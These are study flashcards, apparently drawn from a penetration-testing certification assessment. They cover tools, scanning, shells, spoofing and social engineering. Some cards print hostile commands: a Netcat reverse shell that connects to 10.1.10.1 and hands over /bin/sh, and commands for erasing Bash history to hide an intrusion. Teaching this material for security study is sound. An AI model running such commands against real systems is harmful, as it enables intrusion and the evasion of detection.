Wiley - Assessment Test missed/items Flashcards
Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?
- SQL injection
- VM escape
- Buffer overflow
- Cross‐site scripting
VM Escape
Web applications commonly experience SQL injection, buffer overflow, and cross‐site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You’ll learn more about all of these vulnerabilities in Chapters 5 and 9.
NDA
A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test.
SOW
An SOW is a statement of work, which defines what will be done during an engagement
MSA
An MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work)
Noncompete
Noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.
Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?
- ZAP
- Nessus
- SonarQube
- OllyDbg
The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing
ZAP
The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing
Nessus
Vulnerability Scanner
Nessus is designed to identify and report on potential vulnerabilities in computer systems, networks, and applications.
It performs this task by:
- scanning for open ports
- detecting services running on those ports
- testing those services for known vulnerabilities
SonarQube
SonarQube is a comprehensive code quality assurance tool designed to analyze and improve the quality, security, and maintainability of source code.SonarQube is a static software testing tool (SAST tool)
OllyDbg
OllyDbg is a powerful, user-friendly debugger and disassembler primarily designed for reverse engineering and debugging applications on Microsoft Windows
Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?
- Record the details in the penetration testing report.
- Remediate the vulnerability that allowed her to gain access.
- Report the potential compromise to the client.
- No further action is necessary because Renee’s scope of work is limited to penetration testing.
Report the potential compromise to the client.
Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
- Black box
- Authenticated
- Internal view
- External view
An authenticated, or credentialed, scan provides the most detailed view of the system. Black‐box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow.
Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?
- history -c
- kill -9 $$
- echo “” ˃ /~/.bash_history
- ln /dev/null ~/.bash_history -sf
ln /dev/null ~/.bash_history -sf
Although all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything.
Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?
- Nmap
- Nikto
- Wireshark
- CeWL
Nikto
Nikto
open-source web server scanner designed to identify and report on potential vulnerabilities and misconfigurations in web servers.
CeWL
The Custom Wordlist Generator (CeWL) is used to spider websites for keywords
Wireshark
Wireshark is a powerful, free, and open-source network protocol analyzer that is widely used for capturing, displaying, and analyzing network traffic
Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?
- OSINT
- HSI
- Background
- None of the above
OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test
Which of the following activities constitutes a violation of integrity?
- Systems were taken offline, resulting in a loss of business income.
- Sensitive or proprietary information was changed or deleted.
- Protected information was accessed or exfiltrated.
- Sensitive personally identifiable information was accessed or exfiltrated.
Sensitive or proprietary information was changed or deleted
Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach.
Ted wants to scan a remote system using Nmap and uses the following command:
nmap 149.89.80.0/24
How many TCP ports will he scan?
- 256
- 1,000
- 1,024
- 65,535
By default, Nmap will scan the 1,000 most common ports for both TCP and UDP
Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?
- Penetration testing
- Vulnerability scanning
- Remediation
- Threat hunting
Threat hunting
Threat hunting uses the attacker mindset to search the organization’s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian’s activity clearly fits this definition.
Liam executes the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh
What has he done?
- Started a reverse shell using Netcat
- Captured traffic on the Ethernet port to the console via Netcat
- Set up a bind shell using Netcat
- None of the above
Started a reverse shell using Netcat
Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell
Reverse Shell
A reverse shell is a type of cyber attack that allows an attacker to gain remote access to a victim’s machine by establishing a connection from the victim’s system back to the attacker’s system. This method circumvents traditional security measures, such as firewalls, which often filter incoming connections but may allow outgoing connections more freely.
How Reverse Shells Work
1. Connection Initiation: In a reverse shell scenario, the victim’s machine initiates an outbound connection to the attacker’s machine. This is in contrast to a traditional bind shell, where the attacker connects directly to the victim’s machine.
2. Exploitation: Attackers typically exploit vulnerabilities in applications or use social engineering techniques (such as phishing) to execute malicious scripts on the victim’s system. Once executed, these scripts create a connection back to the attacker’s server.
3. Command Execution: After the connection is established, the attacker can send commands to be executed on the victim’s machine, effectively gaining control over it as if they were physically present.
Netcat is often used with reverse shells
Bind Shell
A bind shell is a type of network shell that allows an attacker to connect to a target machine by establishing a listening service on that machine. Here are the key aspects of bind shells:
Definition
A bind shell listens on a specific port for incoming connections. Once a connection is established, it provides the connecting user with a command-line interface (shell) on the target system, allowing them to execute commands remotely.
How Bind Shells Work
* Listening Service: The target machine runs a service (often created using tools like Netcat or custom scripts) that listens on a designated port for incoming connections.
* Connection Initiation: The attacker connects to this listening port from their own machine, effectively gaining access to the shell of the target system.
* Command Execution: Once connected, the attacker can execute commands as if they were physically present at the target machine.
Use Cases
* Remote Administration: Bind shells can be used legitimately by system administrators for remote management of servers and devices. They allow administrators to perform tasks such as monitoring system performance, updating software, and managing configurations.
* Malicious Activity: Attackers may use bind shells to gain unauthorized access to systems, execute commands, and potentially install malware.
Security Implications
Exposure Risk: Since bind shells listen for incoming connections, they can expose the target machine to unauthorized access if not properly secured. If an attacker discovers an open port, they can connect and take control of the system.
Firewall Challenges: Many firewalls block incoming connections by default, making bind shells less effective in environments with strict security measures. This limitation often leads attackers to prefer reverse shells instead.
Difference between Bind Shell and Reverse Shell
A bind shell is a type of network shell that allows an attacker to connect to a target machine by establishing a listening service on that machine.
In contrast to bind shells, reverse shells initiate a connection from the victim’s machine back to the attacker’s machine. This method is often preferred because it can bypass firewalls that block incoming connections but allow outgoing ones.
VLAN Double tagging
VLAN double‐tagging attack used against 802.1q interfaces. The first tag will be stripped, allowing the second tag to be read as the VLAN tag for the packet.
Alaina wants to conduct an on‐path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?
- ARP spoofing
- IP proofing
- DHCP pirating
- Spoofmastering
ARP Spoofing
Alaina would choose ARP spoofing over IP proofing for its effectiveness in local networks, ease of execution, and ability to exploit the inherent trust in ARP communications to carry out her on-path attack.
IP Spoofing
A technique where an attacker falsifies the source IP address in packets to impersonate another device, often used in denial-of-service (DoS) attacks or to bypass access controls.
Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?
- Authority
- Scarcity
- Likeness
- Social proof
Social proof
Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester.
Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on‐site via the network?
- Shoulder surfing
- Kerberoasting
- USB key drop
- Quid pro quo
USB Key Drop
Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?
-rwsr-xr—1 root kismet 653905 Nov 4 2016 /usr/bin/kismetcapture
- An encrypted file
- A hashed file
- A SUID file
- A SIP file
a SUID file
The s in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner.
Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?
- Nmap
- Traceroute
- regmon
- Whois
Whois
Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?
- Run system-detect-virt.
- Run ls -l /dev/disk/by-id.
- Run wmic baseboard to get manufacturer, product.
- Run dmidecode to retrieve hardware information.
Run wmic baseboard to get manufacturer, product.
All of these commands are useful ways to determine if a system is virtualized, but wmic is a Windows tool.
What is the Windows search order?
- the directory the application is in
- the current directory
- the Windows system directory
- the Windows directory
- and then any directories listed in the PATH variable.
